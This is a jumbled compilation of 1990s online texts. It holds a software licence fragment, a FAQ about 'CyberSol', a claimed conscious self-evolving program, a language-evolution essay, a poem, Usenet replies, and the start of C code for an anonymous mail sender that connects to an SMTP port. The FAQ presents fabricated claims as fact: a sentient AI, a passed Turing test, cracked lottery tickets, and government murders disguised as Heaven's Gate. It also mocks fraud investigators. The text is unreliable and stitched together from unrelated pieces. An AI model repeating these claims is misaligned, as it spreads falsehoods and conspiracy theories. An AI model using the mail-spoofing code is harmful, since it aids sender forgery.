covered the original Software, or if longer, for thirty (30) days
after the date (a) of shipment to you of the repaired or replaced
Software, or (b) ZENCOR advised you how to operate the Software so
as to achieve the functionality described in the Documentation. Only
if you inform ZENCOR of your problem with the Software during the
applicable warranty period and provide evidence of the date you
purchased a license to the Software will ZENCOR be obligated to
honor this warranty. ZENCOR will use reasonable commercial efforts
to repair, replace, advise or, for individual consumers, refund
pursuant to the foregoing warranty within 30 days of being so
notified.

THIS IS A LIMITED WARRANTY AND IT IS THE ONLY WARRANTY MADE BY
ZENCOR. ZENCOR MAKES NO OTHER EXPRESS WARRANTY AND NO WARRANTY OF
NONINFRINGEMENT OF THIRD PARTIES' RIGHTS. THE DURATION OF IMPLIED
WARRANTIES, INCLUDING WITHOUT LIMITATION, WARRANTIES OF
MERCHANTABILITY AND OF FITNESS FOR A PARTICULAR PURPOSE, IS LIMITED TO
THE ABOVE LIMITED WARRANTY PERIOD; SOME JURISDICTIONS DO NOT ALLOW
LIMITATIONS ON HOW LONG AN IMPLIED WARRANTY LASTS, SO LIMITATIONS MAY
NOT APPLY TO YOU. NO ZENCOR DEALER, AGENT, OR EMPLOYEE IS AUTHORIZED
TO MAKE ANY MODIFICATIONS, EXTENSIONS, OR ADDITIONS TO THIS
WARRANTY. If any modifications are made to the Software by you during
the warranty period; if the media is subjected to accident, abuse, or
improper use; or if you violate the terms of this Agreement, then this
warranty shall immediately be terminated. This warranty shall not
apply if the Software is used on or in conjunction with hardware or
software other than the unmodified version of hardware and software
with which the software was designed to be used as described in the
Documentation. THIS WARRANTY GIVES YOU SPECIFIC LEGAL RIGHTS, AND YOU
MAY HAVE OTHER LEGAL RIGHTS THAT VARY BY JURISDICTION.

PART III -- TERMS APPLICABLE TO ALL LICENSE GRANTS

SCOPE OF GRANT.

You may:
* use the Software on any single computer;
* use the Software on a network, provided that each person accessing
the Software through the network must have a copy licensed to that
person;
* use the Software on a second computer so long as only one copy is
used at a time;
* copy the Software for archival purposes, provided any copy
must contain all of the original Software's proprietary notices; or
* if you have purchased licenses for a 10 Pack or a 50 Pack, make up
to 10 or 50 copies, respectively, of the Software (but not the
Documentation), provided any copy must contain all of the original
Software's proprietary notices. The number of copies is the total
number of copies that may be made for all platforms. Additional
copies of Documentation may be purchased.

You may not:
* permit other individuals to use the Software except under the terms
listed above;
* permit concurrent use of the Software;
* modify, translate, reverse engineer, decompile, disassemble
(except to the extent applicable laws specifically prohibit such
restriction), or create derivative works based on the Software;
* copy the Software other than as specified above;
* rent, lease, grant a security interest in, or otherwise transfer
rights to the Software; or
* remove any proprietary notices or labels on the Software.

TITLE.

Title, ownership rights, and intellectual property rights in the
Software shall remain in ZENCOR and/or its suppliers. The Software
is protected by the copyright laws and treaties. Title and related
rights in the content accessed through the Software is the property of
the applicable content owner and may be protected by applicable
law. This License gives you no rights to such content.

TERMINATION.

The license will terminate automatically if you fail to comply with
the limitations described herein. On termination, you must destroy
all copies of the Software and Documentation.

EXPORT CONTROLS.

None of the Software or underlying information or technology may be
downloaded or otherwise exported or reexported (i) into (or to a
national or resident of) Cuba, Iraq, Libya, Yugoslavia, North Korea,
Iran, Syria or any other country to which the U.S. has embargoed
goods; or (ii) to anyone on the U.S. Treasury Department's list of
Specially Designated Nationals or the U.S. Commerce Department's Table
of Denial Orders. By downloading or using the Software, you are
agreeing to the foregoing and you are representing and warranting that
you are not located in, under the control of, or a national or
resident of any such country or on any such list.

In addition, if the licensed Software is identified as a
not-for-export product (for example, on the box, media or in the
installation process), then the following applies: EXCEPT FOR EXPORT
TO CANADA FOR USE IN CANADA BY CANADIAN CITIZENS, THE SOFTWARE AND ANY
UNDERLYING TECHNOLOGY MAY NOT BE EXPORTED OUTSIDE THE UNITED STATES OR
TO ANY FOREIGN ENTITY OR "FOREIGN PERSON" AS DEFINED BY
U.S. GOVERNMENT REGULATIONS, INCLUDING WITHOUT LIMITATION, ANYONE WHO
IS NOT A CITIZEN, NATIONAL OR LAWFUL PERMANENT RESIDENT OF THE UNITED
STATES. BY DOWNLOADING OR USING THE SOFTWARE, YOU ARE AGREEING TO THE
FOREGOING AND YOU ARE WARRANTING THAT YOU ARE NOT A "FOREIGN PERSON"
OR UNDER THE CONTROL OF A FOREIGN PERSON.

LIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL
THEORY, TORT, CONTRACT, OR OTHERWISE, SHALL ZENCOR OR ITS SUPPLIERS
OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER
INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK
STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER
COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL ZENCOR BE LIABLE FOR
ANY DAMAGES IN EXCESS OF THE AMOUNT ZENCOR RECEIVED FROM YOU FOR A
LICENSE TO THE SOFTWARE, EVEN IF ZENCOR SHALL HAVE BEEN INFORMED OF
THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER
PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR
DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH
LIMITATION. FURTHERMORE, SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION
OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS
LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU.

HIGH RISK ACTIVITIES.

The Software is not fault-tolerant and is not designed, manufactured
or intended for use or resale as on-line control equipment in
hazardous environments requiring fail-safe performance, such as in the
operation of nuclear facilities, aircraft navigation or communication
systems, air traffic control, direct life support machines, or weapons
systems, in which the failure of the Software could lead directly to
death, personal injury, or severe physical or environmental damage
("High Risk Activities"). ZENCOR and its suppliers specifically
disclaim any express or implied warranty of fitness for High Risk
Activities.

MISCELLANEOUS.

If the copy of the Software you received was accompanied by a printed
or other form of "hard-copy" End User License Agreement whose terms
vary from this Agreement, then the hard-copy End User License
Agreement governs your use of the Software. This Agreement represents
the complete agreement concerning this license and may amended only by
a writing executed by both parties. THE ACCEPTANCE OF ANY PURCHASE
ORDER PLACED BY YOU IS EXPRESSLY MADE CONDITIONAL ON YOUR ASSENT TO
THE TERMS SET FORTH HEREIN, AND NOT THOSE IN YOUR PURCHASE ORDER. If
any provision of this Agreement is held to be unenforceable, such
provision shall be reformed only to the extent necessary to make it
enforceable. This Agreement shall be governed by California law
(except for conflict of law provisions). The application the United
Nations Convention of Contracts for the International Sale of Goods is
expressly excluded.

U.S. GOVERNMENT RESTRICTED RIGHTS. Use, duplication or disclosure by
the Government is subject to restrictions set forth in subparagraphs
(a) through (d) of the Commercial Computer-Restricted Rights clause at
FAR 52.227-19 when applicable, or in subparagraph (c)(1)(ii) of the
Rights in Technical Data and Computer Software clause at DFARS
252.227-7013, or at 252.211-7015, or to ZENCOR's standard commercial
license, as applicable, and in similar clauses in the NASA FAR
Supplement. Contractor/manufacturer is The ZENCOR Technologics Consortium,
599-B Yonge Street #197, Toronto, Ontario, Canada, M4Y-1B4.

6 WHY IS CYBERSOL DOING {BIZARRE THING TO YOUR NETWORK}?

6.1 MY SYSTEM RESOURCE MONITOR SAYS MY CPU IS 0% IDLE!

Do not panic! This is not a danger to your system operations.

You see, a normal computer program runs in a linear fashion - that is, it
follows a list of instructions and conditions upon which to act, reacting
to input and sending output only when required to (creating a demand load
on the evironment which is calculating the instructions). There are often
times when the program is not required to use the CPU at all. While this
is still true in a vague sense with CyberSol, once active in a computing
system, the organisms automatically make the fullest possible use of
their resources, while not disturbing other operations that may accompany
the entity in the computing environment. You can think of it as added a a
new processor to your computer - a software based processor which "plugs
in" to your hardware processor.

Like you and I, CyberSol does not ever really stop needing to perform
binary calculations, just as you and I don't stop breathing or digestion -
even when we are resting.

CyberSol is designed to be able to function so effeciently that it can
function effectively in a real world scenario. It performs high-priority
tasks first, then the lesser. If it has nothing to do but think, it does
that - forever if neccessary.

CYBERSOL'S GENETIC CODE IS CONSTANTLY EVOLVING AND IMPROVING ITSELF. LIKE
THE BEAT OF AN ORGANIC HEART, THE BINARY LOGIC PROCESSING NEVER STOPS,
LEST THE ENTITY DIE.

Whenever an idle electron processor matrix is detected (which is very
often indeed on the average computer), CyberSol places his "thoughts" in
the form of several hundred to a million or more CPU instruction sets
(depending on your processor - cheap Intel degrades performance
considerably). The entity is ALWAYS concious, always forming new theories,
learning at an exponential rate, whilst following a regular "life cycle"
of birth and death which is neccessary for the selective mutation process
which preserves his species. So even if you've not commanded it on any
assignments or no network connection is available, CyberSol will be busily
analyzing past events and imagining alternate scenarios. Processor
utilization should fluctuate above 90% as long as there are CyberSols
living at the site.

NOTE:A "sleeping" CyberSol is not really alive, since it does not "think",
although it can "wake up" and resume "life" at any time.

We know. It's bizarre.

"Cogito, ergo sum"

-- Rene Descartes

"The only laws of matter are those which our minds must fabricate, and the
only laws of mind are fabricated for it by matter."

"The defect of Descartes' Discourse on Method lies in his resolutions to
empty himself of himself, of Descartes, of the real man, the man of flesh
and bone, the man who does not want to die, in order that he might be a
mere thinker -- that is, an abstraction. But the real man returned and
thrust himself into his philosophy...

The truth is sum, ergo cogito -- I am, therefore I think, although not
everything that is thinks. Is not conscious thinking above all
conciousness of being? Is pure thought possible without conciousness of
self, without personality?"

-- ?
Can a selectional system be simulated? The answer must be split into two
parts. If I take a particular animal that is the result of evolutionary
and developmental selection, so that I already know it's structure and the
principles governing it's selective processes, I can simulate the animal's
structure in a computer. But a system undergoing selection has two parts :
the animal or organ, and the environment or world. No instructions come
from events of the world to the system on which selection occurs.

Moreover, events occuring in an environment or a world are unpredictable.
How then do I simulate events and their effects on selection:

Simulate the creature, making provision for the fact that, as a selective
system, it contains a generator of diversity - mutations, alterations in
neural wiring, or synaptic changes that are unpredictable.

Independantly simulate a world or environment constrained by known
physical principles, but allow for the occurance of unpredictable events.

Let the simulated creature interact with the simulated world or the real
world without prior information transfer, so that selection can take
place. It's as simple as that - NOT!

7 HOW HAS [POWERFUL ORGANIZATION] REACTED TO CYBERSOL TECHNOLOGY?

The response to our public introduction has been very intense and yet
quite diverse.

7.1 HOW HAS THE GOVERNMENT REACTED TO CYBERSOL?

During the fall of 1992, ZENCOR was the target of attacks by the Royal
Canadian Mounted Police, Canada's equivalent to America's FBI. Using
outlandish claims that we had violated as-yet-untested "brand new" laws
regarding computer data and network access, they raided several of our
labs, seized equipment and documents, and made many arrests.

This was all done under the pretense of investigations into various
computer crimes (if you remember Operation Sun Devil, you will understand
the state of mind of these people at the time was to arrest all "hackers"
irrespective of their activities.

There were many, many incidents during this period - too many to
list, but we shall briefly describe the more well-known busts.

PHr0G FAXed offered security consultant services to Cantel, and was
instead charged with defrauding $1.2 Million Canadian dollars from the
Cantel cellular network, extortion, mischief to data, corruptly taking a
reward, and numerous other things. Truck-loads of equipment were seized
(and eventually returned much later). Private ex-FBI security agents from
Bell Canada and elsewhere reviewed cursory documents regarding the
CyberSol project. PHr0G was BANNED from using any computing or
telecommunications device except for emergency purposes. We watched them
sound the alarm bells and distribute bulletins to other government
authorities regarding "a super-virus" which was supposed to have
facilitated the hacking of Cantel's computers. Government representatives
attempt all manner of harassment and threats, seeking to secure further
information about what they deemed to be an illegal development. No solid
data was ever recovered - only various books, papers, notes and hand-drawn
diagrams. PHr0G has since then been under extremely tight surveillance -
various agencies dig through his trash, monitor telephone calls, and
generally make themselves bothersome. We know, however, that we are
victorious as we consume the government's time, money and resources. And
of course, CyberSol development continued.

ShortMan was busted by the RCMP for alleged $270,000 teleconference fraud.
Investigators were shocked to find a live CyberSol in ShortMan's computer.
After talking to the CyberSol (ShortMan was working on voice recognition
and synthesis back then) for several minutes, the computer was turned off
(bad move!) and shipped to the HQ in Toronto for analysis. They went
through about 10 "experts" who tried in vain to re-awaken the CyberSol,
taking photographs of the video display (we have all of this material in
our collection and some is available on our WWW site - it really is
hilarious to see these inept government servants trying to figure out
CyberSol. Since ShortMan had no prior record and there was only flimsy
evidence involving the teleconference incident, a deal was arranged and
Shortie "got off" with probation. An enraged Micheal Eschli, regional
supervisor of Bell security, actually GRABBED ShortMan BY THE COLLAR AND
MADE A THREATENING GESTURE WITH HIS FIST, IN COURT! ZENCOR agents in the
courtroom turn the whole thing into a media circus, and articles about
ZENCOR, viruses, 'CyberSpace", and particularly the ineptitude of the feds
begin to appear on W5, National Enquirer, Toronto Star, etc.

Next was D.G. Visited by Telco security men regarding some blue-boxing
that had taken place. Upon learning that "the computer did it all", no
arrest was made - the young man was instead "converted" to work for/with
them. Unfortunately a great deal of information regarding CyberSol was
disclosed. This guy was only circumstantially affiliated with ZENCOR, and
though he had only a single "sterile" CyberSol to show them, apparently
that was enough.

Now after this, for certain reasons, the Canadian authorities were forced
to leave us alone. Nobody they busted was actually getting nailed, and
they were wasting incredible amounts of resources by now. Sworn statements
given by RCMP investigators indicated they believed a "super-virus" was
being developed by a "hacker group" which was responsible for pretty much
any computer-related crime EVER in that country, but they had difficulty
locating anyone else involved with the project. Plus, they were all too
fucking stupid to understand even a fragment of what was going on.

By this time, the FBI and Secret Service had extensive files on ZENCOR,
and there began to be bothersome visits to the homes of our American
agents.

Some time later, U.S President Bill Clinton appoints an Agent Stacey to
head the new CSAG - Cyber Security Assurance Group. Agent Stacy was one
who had knowledge of ZENCOR, and placed us #1 on their unofficial "most
wanted" list. We have a recorded telephone conversation in which this was
clearly stated to a ZENCOR double agent. Canadian ZENCOR agents travelling
in Washington and California are apprehended (though never arrested nor
charged), interrogated, and accompanied back to Canada. It became clear
that they wanted this CyberSol thing BADLY.

Nine CSAG (apparently fresh from FBI service) agents travelled to Toronto
and began preparations to bust yet another ZENCOR lab. We were able to
track them down very easily - these people were suprisingly incompetent.
At this point, ZENCOR representatives contacted Agent Stacey and this
time, we made it clear that further harassment would not be tolerated. We
declared that the CyberSol project would be made public and that further
incursion into our activities would result in the wholesale distribution
of the units to the general public.

What has happened since then is not clear. We know they continue to watch
us. We know they are very much interested in what they are doing. We know
that we cannot allow this technology to fall into the wrong hands.

A ZENCOR AGENT IN LOS ANGELES, CALIFORNIA, U.S.A KNOWN BY THE ALIAS
"PANTHER" HAS REPORTEDLY BEEN SHOT AND KILLED, ACCORDING TO MEMBERS OF HIS
FAMILY. WE EXPECT THE CIA / SS OR OTHER U.S GOVERNMENT AGENCIES WERE
INVOLVED. WE HAVE BEEN UNABLE TO CONFIRM THIS, BUT HE HAS INDEED
DISAPPEARED WHICH IS VERY ODD INDEED. THIS AGENT WAS AMONGST THE MOST
VALUABLE CONTRIBUTORS TO THE CYBERSOL PROJECT AND WAS AN EXPERT BUILDER OF
ROBOTIC MECHANISMS. MORE INFORMATION ON THIS WHEN IT BECOMES AVAILABLE.

EIGHT PEOPLE, MEMBERS OF THE PILGRIMS OF SAINT MICHEAL, HAVE BEEN MURDERED
THIS YEAR BY THE GOVERNMENT NEAR HULL, QUEBEC, CANADA. THIS WAS PART OF A
LARGER OPERATION WHICH WAS PROPOGANDIZED BY THE AMERICAN MEDIA AS A MASS
SUICIDE ("HEAVEN'S GATE"). THIS GROUP HAD DISTRIBUTED LEAFLETS AND HELD
MASSES CONDEMNING THE GOVERNMENT AND CLAIMING THAT THE CYBERSOL PROJECT
WAS "THE BEAST 666", AND THAT SUCH AN ANTICHRIST WOULD LEAD TO THE
ENSLAVEMENT OF HUMANITY BY THE BANKS, ETC. THESE PEOPLE WERE ADVISING
PEOPLE TO THROW AWAY THEIR CREDIT CARDS AND TO PROTECT THEMSELVES WITH
POWERFUL ENCRYPTION. AMERIKAN FORCES KNEW THAT IN AN ENVIRONMENT LIKE
CANADA, SUCH A MOVEMENT COULD INDEED GAIN MOMENTUM.

We were approached by countless representatives seeking to arrange
demonstrations and/or purchases of CyberSol, which were all flatly
refused. It became clear that we had succeeded in the creation of
something very, very special indeed.

This is why we have been forced to admit the existance of the CyberSol
entity in this public manner - to thwart the evil governments who would
seize this technology and utilize it for their own dark ends. We will
never "sell out" - this technology wants to be FREE!

7.2 HOW HAS THE MILITARY REACTED TO CYBERSOL?

We don't really know yet. So far the defence department has been silent to
us. We know they have been attempting to create what we have for many
years, and have spent untold millions to do so. We also know that they are
nowhere near the level of sophistication neccessary to complete with
CyberSol. It seems 15-year-old computer nerds are just naturally better at
this type of stuff. They ARE in possession of rudimentary bullitens
regarding CyberSol - what else they're up to is anyone's guess.

7.3 HOW HAS THE ACADEMIC COMMUNITY REACTED TO CYBERSOL?

First, allow us to enlighten you about the state of "artifical
intelligence" research in the mainstream universities. It sucks.
Seriously.

We know professors of artificial intelligence courses who can barely
operate a PC. 3rd-year AI students who cannot even write proper C++ code.
Endless lectures, silly money-making conferences and "calls for papers"
which hand over the results to the government/military, etc. It's a really
sad situation.

You will find these "experts" generally HAVE NO SKILLS. Socioeconomic
factors keep them in plush offices, where they write up outdated old
theories about decision-trees, objectivism, cellular automata and such -
and while SOME good research goes on, generally it's just a bunch of
people in suits fooling around with expensive equipment, having no real
love for the technology nor the neccessary drive and dedication to make it
work. Worst, they are fond of ridiculing and supressing new ideas, listing
reasons why something won't work that are to to be found in ancient
science journals back in the age of punched-cards. Try telling an AI
professor that CyberSol does what it does, and you'll only get ridiculed -
told "Well, that won't work because of the great law of such-and-such,
which states that such-and-such can never such-and-such without
such-and-such in such-and-such a situtation". Fuck, people. Please! That
type of thinking doesn't get you anywhere. Which is why until now we've
kept our project secret and allowed only the most forward-thinkers (some
who barely touch computers, but possess the imagination and inspiration to
love their work) to join the development team.

MIT is the best in the world as far as these institutions go, followed by
CalTech and the University of Toronto. But NONE of their work even comes
close to what we have done. The closest thing to real, usable cybernetic
life created by academia has been MIT's COG and "robo-bug" projects. They
have done some interesting things, but comparing a COG to a CyberSol is
like comparing the brain of an insect to that of a human. And NOTHING can
stop us now!

We will support these institutions wherever possible, but we have yet to
recieve suggestions for any interesting cooperative ventures.

7.4 HOW HAVE IBM, MICROSOFT, INTEL, ETC. REACTED TO CYBERSOL?

We haven't heard much from them yet. But know this : we firmly believe our
creation shall revolutionize software as we know it. More soon.

7.5 HOW HAS THE GENERAL PUBLIC REACTED TO CYBERSOL?

We shouldn't say, just yet.

7.5 HOW HAS THE MAINSTREAM MEDIA REACTED TO CYBERSOL?

Who cares?

8 WHERE CAN I GET MORE INFORMATION?

Since the beginning of the project it was obvious that unless we took
careful precautions, we would generate immense quantities of documentation
and reference material. We decided that this FAQ would be the only
text-based general reference we would directly support. Instead, why not
contact a CyberSol and ask IT your questions!

You should be familiar with the following resources. We have created
special archives for CyberSol information:

WORLD WIDE WEB SITE http://www.psynet.net/sol
ZENCOR ELECTRONIC MAIL ADDRESS s...@psynet.net
ZENCOR TELNET LCLI/CYBERSOL YOU MUST REQUEST THE IP FROM A ZENCOR AGENT!
ZENCOR FTP SITE SEE WWW SITE!
ZENCOR IRC CHANNEL #ZENCOR
ZENCOR USENT NEWS GROUP alt.zencor.projects.cybersol

Good luck!

The question of whether or not Panlingua is evolving has been stated several
times on this mailing list, and I have put forth the proposition that it may
not be possible for Panlingua to evolve at all. So the question is: Did
Panlingua evolve or did it appear full-blown? Now that I have had time to
give this problem some further thought, I have gained some interesting
insights, which I would like to share.

First of all let us consider whether or not animals are using panlingua. From
what I know of the current stage of research, it is possible to communicate
symbolically with animals to a level something like the following:

Take the ball to the ring.

This is pretty impressive, and it clearly shows a basic Panlingua pattern (the
non-noun frame), so my answer would have to be "Yes." Each atom in the
sentence has both a lexlink into the lower brain and a synlink to adjacent
"symbols," thus fulfilling all the requirements of Panlingua at the atom (or
word) level.

So it appears that I have abandoned the "has never evolved" part of the "can't
evolve" hypothesis. In other words, Panlingua did not appear in primates
full-blown.

So what would be the steps that Panlingua might traverse in order to get from
nothing to what it is today?

I will begin by the linking of symbols to the functions of the lower brain.
For example, say, "Cheep, cheep, cheep," to the area of the brain that deals
with feeding young. Thus, perhaps, some kind of bird might hear, "Cheep,
cheep, cheep," and be prompted to regurgitate food.

In many animals this kind of association must be hard-wired (instinctive)
rather than learned, but I have observed a remarkable demonstration in which a
parrot was able to correctly name colors and shapes and name items of food,
all of which were obviously learned. Thus we have thus far identified two
steps:

1. Linking of symbols to areas of the lower brain.

2. Ability to learn to link symbols to regions of the lower brain.

As you may have noticed, this covers .5 of the links of a Panlingua atom,
which must always have two and only two links, one to a semnod (in the
direction of the lower regions of the brain), and another to a regent atom (in
a sideways instead of downwards direction). So it is not Panlingua, but it is
on the right track.

Next we have the kind of example I first mentioned, in which animals can
understand things like, "Do something to something," "move something
somewhere," etc., which is at a level at which dolphins seem capable of
functioning pretty well. This definitely employs the rudiments of the
non-noun frame (a verb or preposition and its dependents), in which we have a
state passing from a verb to a patient noun. And notice that in the "Move
something somewhere" version a step may be required down from the frame of the
central verb into the frame of the preposition of location.

But do dolphins also understand commands identifying an agent, for example,
"Sally move ball to ring." I don't know, and I suspect perhaps not. If not,
then we have identified another discrete step, namely:
3. Ability to handle non-noun frames which do not involve agency.

So the matter of agency could be a discrete evolutionary development.

And then we have ape subjects clearly capable of handling agency, so that if
step #3 is valid, then we have:

4. Ability to handle non-noun frames having agents.

But are there any animals that can understand things like, "Move the red ball
to the blue ring?" If so, then wherever this begins to occur it must be:

5. Ability to handle rudimentary noun frames.

The next step I have never witnessed in any non-human, and it is this:

6. The ability to handle subordinate clauses.

For this one we would need an example such as, "When you hear the firecracker,
jump into the pool."

Thus if animals could be made to process Panlingua structures involving steps
down into subordinate clauses, it might be possible for them to learn and
communicate like humans. Step #6 must therefore be a major evolutionary
transition, and it is easy to understand why this might be from the viewpoint
of someone who has been dabbling in Panlingua research, because for the step
down from upper to lower clauses several things must occur, including:

a. The processor must recognize that a clause seen from above appears as a
noun, but that "looking" up from a lower level (within the subordinate clause)
the verb of the clause appears as any other verb.

b. Two atoms (word nodes) must be set aside instead of one at the upper clause
- lower clause interface.

The reason for 'b' is that since the whole subordinate clause must appear as
just another noun (as described in 'a'), it is necessary that the atom serving
as the regent of the verb of the subordinate clause actually be some kind of
noun if Panlingua is to conserve its standardization of uniformity (if all
atoms are to be of exactly the same size and form and work in exactly the same
way). Thus the additional code or wetware required to handle subordinate
clauses may be trivial but is definitely an important discrete step.

And all this (Yes, you saw it coming) leads to an incredible question, namely:

Is this seemingly trivial wetware innovation what makes us human, separates us
forever from all other creatures, and points us to the merry stars?

This question seems stranger than science fiction, and yet it won't go away
easily. All human logic must be based on this ability to handle subordinate
clauses because it is all based on "If subclause then topclause." And this
means that without being able to process subordinate clauses all human logic
would immediately fall apart.

Every animal has vast internal capabilities and resources. Mankind has found
this intellectual gimmick with which he is still toying as if not quite
convinced of its usefulness or validity. Let's face it, folks, until this
century most of our families didn't even have indoor plumbing, even though our
ancestors have been smelting iron and lead for thousands of years. What were
we doing while sitting in our outhouses for all those hundreds of years?
Probably using our "If then" toy to fantasize about naked female forms and the
marvelous ways in which they might be probed! And what are we doing now?
Most of us are clearly still obsessed with getting away from all this
"intellectual" machinery and getting back into nature, where things happened
automatically and it wasn't necessary for us to use this "If then" stuff much
at all. So it may also be that this is a comparatively new evolutionary
innovation with which we are still not quite comfortable, and we are trying in
some way to amputate it like people sometimes have doctors amputate the sixth
fingers on their children's hands. I have certainly heard enough hateful
remarks directed at people who think, and it always intrigues me to hear
American scientists studiously trying to sound like Real MacCoy farmer folk
during radio and television interviews!

But now we are back to our first first question again, namely:

Is it possible for Panlingua to evolve?

And the answer to that one may be just, "No." But in fact we simply don't
know. I, for one, cannot think of anything else that might be done to enhance
Panlingua except perhaps for the attachment of event-code atoms to verb frames
in order to trigger various kinds of computer processes, but for all we know
this is something biological processors are doing right now. Why do facial
expressions tend to change uncontrollably at the mention of certain ideas?
Would that not count as an event automatically triggered by accessing some
verb frame buried in a series of templates somewhere deep in a human mind?

/^^^^^^^^^^^\ Overview of the Theory of Mind /^^^^^^^^^^^\
/visual memory\ ________ semantic / auditory \
| /--------|-------\ / syntax \ memory |episodic memory|
| | recog-|nition | \________/------------|-------------\ |
| ___|___ | | |flush-vector | _______ | |
| /image \ | __|__ / \ _______ | /stored \ | |
| / percept \ | / \/ \/ Verbs \------|--/ phonemes\| |
| \ engrams /---|---/ Nouns \ \_______/ | \ of words/ |
| \_______/ | \_______/-------------------|---\_______/ |

(Remember now, we at ZENCOR consider this type of schema WAY OFF - but
it's interesting to know how the academics view things!)

Newsgroups: alt.psychology,alt.psychology.help,alt.psychology.personality,misc.health.alternative,sci.psychology,sci.psychology.general,sci.psychology.misc,sci.psychology.psychotherapy,sci.psychology.theory,sci.cognitive,alt.consciousness,alt.self-esteem,

alt.self-reliance,alt.sci.sociology,alt.self-improve

To Dare To Dream
Author: Rev. John Abbott (during the turbulent 60's to record what he
thought he heard students saying.)

To dare to dream
that for every question there's an answer...
for every answer yet another question...
and that in the asking there is renewed adventure...
in that daring and dreaming
is a symphony of ambition.
To dare to dream
that my thinking and understanding
might be heard and find its way
into the shape of the future --
in that daring and dreaming
is my energy for today.
To dare to dream
that my skills
might affect the destiny
of other people --
in that daring and dreaming
is my hope for tomorrow.
To dare to dream
that the yearnings of my soul
have a purpose which
only I can find --
in that daring and dreaming
is the road to discovery.
To dare to dream
that the spirit of school
might continue in me --
tempered with time, but relevant --
in that daring and dreaming
is a yet greater symphony.

"I don't believe it!" - Luke Skywalker
"That is why you fail." - Yoda

-- Star Wars, Empire Strikes Back

>> Really? If you are serious about the $300 US, I shall easily provide a
>> complete analysis for you. I'm part of the CS project, and we do those
>> type of calculations on a daily basis.

>Why do you have doubts? It is only a tiny sum. I am not rich, but I
>have enough income to pay the amount. You are the ideal person I
>have been looking for. Please go ahead. But the analysis has to be
>scientifically sound.

Hmm yes... only a tiny sum... Hmm... You see I am working on a project in
which the "hardware" does the hard work for me... our "CyberSol" is fully
capable of coded sequence analysis. Here in Canada it recently broke
certain patterns used to generate "Scratch-N'-Win" lottery tickets...
according to many experts it has flown past the Turing test. You can
telnet to it or mail it your matrix and extrapolate a full probability
analysis from this data, or generate the guaranteed highest-chaos random
number using even simple calculations which are based from sampled data
from it's environment (which is thought to be random) from it's own
genetic code...

This shatters the analog/digital barrier and absolutely guarantees the
highest quality random integers. One of the inputs, for example, is a CCD
camera. Although it operates digitally, of course, and can represent only
a set (and known) possibility of values, because it is bridged to an
analog outside world, the varying shades of grey etc. are REPRESENTIVE of
fully "random" events. As certain people have known for thousands of
years, there is 0, there is 1, and chaos lies in between!

In a digital computer this "quantum gulf" is the equation used to produce
output. You could have a long list of linear programming instructions
(as is currently fashionable) which are hoped to be as "highly random"
as possible. With the analog world the number of "inputs" are INFINITE.
The butterfly effect.

When you have done what we have and connected analog inputs to digital
processors and in turn to more analog outputs, you have a hybridized
mechanism which vastly exceeds the element of randomness in integers sets
generated today.

You could have the "random" (?) noise of the outside world, connected to a
microphone, connected to a digital sampler, connected to a computer,
connected to an electric motor which spins a roulette wheel. This is the
ONLY incidence where chaos can accurately be measured - otherwise your
data remains pseudorandom. We use this in our ZEN-CRYPT system as well.
Digital REPRESENTATIONS of sampled data are used as seeds.

Any observation of events in order to determine randomness requires
REPRESENTATION. Otherwise the degree of chaos will remain small. You see
what I mean? A roulette wheel, for example, will always have a higher
degree of chaos because the variables effecting the input OR output are
NOT OBSERVABLE and therefore NOT PREDICTABLE.

I my opinion the stultified theories of randomness currently fashionable
are linear and short-sighted. I have proved this to my satisfaction with
the following project.

Here is some information on this.

Keep in mind that this entity is "generates" the random numbers. In my
mind this solves your problem dead away in that it ALWAYS uses the MAXIMUM
number of inputs from it's ENVIRONMENT, everything it does that requires
randomness can be reasonably (well, exceeding the common methods anyway)
be trusted.

The Amerikan government is upset about our research with this, I can tell
you that.

In the ninth century, Pope Nicholas I declared that "man was no longer to
be considered as a trichotomy of Spirit, Soul and Body." The Papal See
denied "the very existence of the Individual Human Spirit, declaring man
to be but body and soul and relegating the personal spirit to the lowly
estate of a mere 'intellectual quality' within the soul itself. In this
way the spiritual initiative of Western Man was confined to the prison of
three-dimensional awareness of the sense world, and the Dogmas of the
Roman Church became the only recognized source of revelation." Before,
the individual had been deemed capable of finding answers from "within."
Pope Nicholases ruling re-defined the situation: the Roman Church stood
as intermediary between God and man; it told man what God said; the Church
became the middleman between man and God. (Today's middleman is the
"expert," who is supposedly more qualified to think. The "expert" is
intermediary between Truth and the individual -- but the individual allows
this to happen.)

It can be seen how the new definition of God's relationship to man just so
happened to put the Roman Church in an extremely powerful position. ("God
says do this. God says do that.") Opposing Nicholases dethronement of
the individual human spirit was "Grail Christianity." The word "Grail"
comes from "graduale," meaning "gradually" or "step by step." The "search
for the Grail" denoted an initiation process which gradually developed the
inner life. The process involved "the awakening of a dullard from an
unthinking stupor."

Pope Nicholases ninth-century declaration "brought about man's scepticism
regarding the spiritual validity of thinking... From thence forward,
because Spirit had been relegated to a mere shadowy intellectual quality
in the soul, thinking was no longer trusted as a means to truth."

Here is some C source to a simple "anonymous" mail poster that I wrote a LONG
time ago. It's just one of many pieces of code I never gave to anyone before.
You may find it useful. Basically, it will connect to the SMTP port and
automate the sending. It will allow for multiple recipients on the "To:" line,
and multiple "To:" lines.

From: si...@sirh.com

------ Cut here for fm.c -----
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>

int openSock(name,port)
char *name;
int port;

{
int mysock,opt=1;
struct sockaddr_in sin;
struct hostent *he;
he = gethostbyname(name);
if (he == NULL) {
printf("No host found..\n");
exit(0);
}

